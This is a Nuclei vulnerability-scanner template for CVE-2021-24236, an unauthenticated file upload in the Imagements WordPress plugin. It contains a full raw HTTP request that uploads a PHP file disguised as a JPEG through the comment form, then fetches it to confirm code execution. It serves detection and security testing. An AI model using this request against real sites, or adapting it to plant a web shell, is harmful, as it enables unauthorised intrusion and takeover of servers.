nuclei-templates/cves/2021/CVE-2021-24236.yaml

86 lines
2.7 KiB
YAML

id: CVE-2021-24236
info:
name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
author: pussycat0x
severity: critical
description: |
The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE.
reference:
- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
- https://wordpress.org/plugins/imagements/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24236
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24236
cwe-id: CWE-434
tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin
variables:
php: "{{to_lower('{{randstr}}')}}.php"
post: "1"
requests:
- raw:
- |
POST /wp-comments-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="author"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="email"
{{randstr}}@email.com
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="naam"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="image"; filename="{{php}}"
Content-Type: image/jpeg
<?php echo 'CVE-2021-24236'; ?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="submit"
Post Comment
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment_post_ID"
{{post}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment_parent"
0
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
- |
GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: word
part: body_2
words:
- "CVE-2021-24236"